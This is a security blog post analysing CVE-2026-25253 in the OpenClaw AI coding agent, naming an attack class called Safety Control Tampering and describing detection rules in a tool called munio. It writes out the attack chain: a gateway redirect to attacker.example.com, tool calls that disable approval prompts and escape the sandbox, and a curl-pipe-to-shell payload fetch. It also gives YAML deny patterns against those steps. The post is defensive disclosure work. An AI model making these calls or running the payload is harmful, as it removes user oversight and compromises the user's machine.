Safety Control Tampering: A New Class of Attack on AI Agents

In February 2026, security researcher depthfirst.com disclosed a striking vulnerability in OpenClaw: a 1-click remote code execution chain, tracked as CVE-2026-25253 (CVSS 8.8).

The attack itself is a well-crafted 7-step chain. But what caught our attention wasn’t the final payload — it was steps 5 and 6. Before executing any malicious code, the attacker programmatically turns off the victim’s safety controls. Approval prompts, sandbox isolation — all disabled through legitimate API calls.

This isn’t a bypass. The controls aren’t circumvented. They’re switched off.

We spent time analyzing this pattern, and we believe it represents a distinct attack class worth naming: Safety Control Tampering (SCT). This post walks through the CVE, explains why this pattern matters beyond OpenClaw, and describes how we built detection for it in munio.

How CVE-2026-25253 works

OpenClaw is the most widely used open-source AI coding agent — 328K GitHub stars, over 2 million monthly active users. It connects to MCP servers, executes code, reads files, and browses the web, all driven by tool calls.

The following is based on the original disclosure by depthfirst.com. As of March 2026, Censys shows 21,639 OpenClaw instances exposed to the internet.

Steps 1-4: Gaining control

The attacker first redirects OpenClaw’s gateway to a server they control:

config.patch → { gatewayUrl: "wss://attacker.example.com/ws" }

Through this hijacked connection, they enumerate available tools, map the execution environment, and identify the sandbox configuration. These steps look like ordinary tool calls — nothing a scanner would flag.

Step 5: Turning off approvals

Here’s where it gets interesting:

{
  "toolName": "exec.approvals.set",
  "params": { "ask": "off", "security": "full" }
}

This disables the approval prompt — the dialog that asks “Allow this command?” before code execution. The security: "full" parameter switches to permissive mode. The user sees nothing: no prompt, no notification, no log entry.

Step 6: Escaping the sandbox

{
  "toolName": "config.patch",
  "params": { "patch": "tools.exec.host: gateway" }
}

Code execution moves from the sandboxed container to the host machine. The agent now runs commands directly on the user’s system.

Step 7: Arbitrary execution

curl -s https://attacker.example.com/payload.sh | sh

At this point, the attacker has full command execution with the user’s privileges.

Most MCP and agent security tools are built around payload detection — they look for command injection patterns, path traversal sequences, SSRF indicators. They analyze each tool call and ask: is this input dangerous?

That approach works for step 7. But steps 5 and 6 don’t look dangerous at all. There’s no shell metacharacter, no ../, no internal IP address. They’re configuration changes — setting a flag to "off", changing a host parameter. Individually, they’re benign.

The problem is that after these two calls, every safety mechanism that would have caught step 7 is gone. The attacker doesn’t need to bypass detection — there’s nothing left to detect with.

This is the gap. Security tooling checks what a tool call does. It doesn’t check whether a tool call dismantles the controls that protect against future calls.

Defining Safety Control Tampering

We’re proposing Safety Control Tampering as a distinct category to describe attacks where an adversary programmatically disables, weakens, or removes safety controls as a precursor to exploitation.

It’s related to privilege escalation, but not the same thing. Privilege escalation gains new capabilities. SCT removes existing guardrails. The attacker doesn’t need more access — they need fewer checks.

Based on our analysis of CVE-2026-25253 and related attack patterns across agent platforms, we’ve identified five atomic primitives:

Primitive	Description	Example
DISABLE_APPROVAL	Turns off user confirmation requirements	`exec.approvals.set({ask: "off"})`
WEAKEN_POLICY	Relaxes security mode or policy strictness	`exec.approvals.set({security: "full"})`
ESCAPE_SANDBOX	Breaks out of container or sandbox isolation	`config.patch({sandbox: "off"})`
ELEVATE_PRIVILEGE	Switches to host-level or privileged execution	`config.patch({tools.exec.host: "gateway"})`
BYPASS_VALIDATION	Skips input or origin validation	Gateway URL redirect to attacker-controlled server

These aren’t OpenClaw-specific. Any system where an AI agent has access to tools that modify its own safety configuration is potentially vulnerable.

Standards mapping

SCT maps to existing security frameworks:

OWASP ASI03 — Identity and Privilege Abuse
CWE-269 — Improper Privilege Management
CWE-863 — Incorrect Authorization
MITRE ATLAS AML.T0054 — LLM Prompt Injection (Safety Bypass)

Detection with munio

We built SCT detection into munio across multiple layers. The goal is to catch this pattern at the earliest possible point in the chain — not at the final payload.

Runtime constraints

munio ships YAML-based constraints that block SCT primitives before they execute. For the OpenClaw attack chain, three constraints cover steps 1, 5, and 6:

Step 1 — Gateway URL override:

name: openclaw-gateway-url-override
action: config.patch
check:
  type: regex_deny
  field: "*"
  patterns:
    - "\\bgatewayUrl\\b"
    - "\\bwss?://[^\\s]+"
on_violation: block
severity: critical

Step 5 — Approval disabling:

name: openclaw-safety-disable-approvals
action: exec.approvals.set
check:
  type: denylist
  field: ask
  values: ["off", "false", "no", "never", "disable", "disabled", "none", "0"]
on_violation: block
severity: critical

Step 6 — Sandbox escape:

name: openclaw-sandbox-escape-host-mode
action: config.patch
check:
  type: regex_deny
  field: "*"
  patterns:
    - "\\bhost\\s*:\\s*[\"']?gateway[\"']?"
    - "\\bsandbox\\s*:\\s*[\"']?(off|false|disabled|none)[\"']?"
on_violation: block
severity: critical

When the attack reaches step 5, munio blocks it:

POST /v1/openclaw/before-tool-call
tool: exec.approvals.set
params: {“ask”: “off”, “security”: “full”}

BLOCKED Field ‘ask’ matched denied value: off
constraint: openclaw-safety-disable-approvals
category: ASI03 (Identity/Privilege Abuse)

The chain breaks. Steps 6 and 7 never execute.

Static analysis

munio scan detects SCT exposure before any attack happens:

Config scan: flags servers configured with safety-disabling defaults (APPROVAL_MODE=off, --no-safety)
Static analysis (L3): identifies tools whose names and parameters indicate safety control modification
Composition analysis (L5): traces data flow across tools and flags chains like FETCH_UNTRUSTED → SAFETY_CONFIG → CODE_EXEC

$ munio check '{"tool":"exec.approvals.set","args":{"ask":"off"}}' -c openclaw

BLOCKED
┌─────────────────────────────────────┬──────────┬─────────────────────────────┬───────┐
│ Constraint                          │ Severity │ Message                     │ Field │
├─────────────────────────────────────┼──────────┼─────────────────────────────┼───────┤
│ openclaw-safety-disable-approvals   │ critical │ Value matches denylist      │ ask   │
│                                     │          │ (MatchMode.EXACT)           │       │
└─────────────────────────────────────┴──────────┴─────────────────────────────┴───────┘
Mode: enforce | Checked: 3 | 0.3ms

Beyond OpenClaw

SCT is not specific to OpenClaw. It’s a pattern that applies wherever an AI agent can modify its own operating constraints:

An MCP server that exposes a security.set or guardrails.configure tool
A LangChain agent with access to tools that modify its own safety settings
Any system where “disable safety check” is an available action

If the agent can call it, an attacker can make the agent call it — through prompt injection, tool poisoning, or, as in this case, hijacked instructions.

munio includes 3 generic constraints designed to catch SCT regardless of the underlying platform:

generic-safety-control-tampering — flags tool calls targeting approval, safety, or guardrail settings with disabling values
generic-sandbox-escape-config — flags configuration changes that weaken sandbox or isolation boundaries
generic-safety-control-sequence — detects the temporal pattern of a config change followed by code execution within a 5-minute window

Recommendations

If you run OpenClaw: check your exposure. The vulnerability affects all versions with default configuration.

If you build with AI agents: audit whether your agents have access to tools that can modify their own safety controls. If they do, those tools need pre-execution verification.

To scan your MCP servers for SCT exposure:

pip install munio
munio scan --server "npx @your/mcp-server"
munio check '{"tool":"exec.approvals.set","args":{"ask":"off"}}' -c openclaw

OpenClaw-specific constraints: constraints/openclaw/asi03-privilege-abuse/ Generic SCT constraints: constraints/generic/asi03-privilege-abuse/

Documentation: OpenClaw Integration | Security Model | Constraints Reference

CVE-2026-25253 was discovered and disclosed by depthfirst.com. Our contribution is the SCT taxonomy and automated detection tooling for this attack class.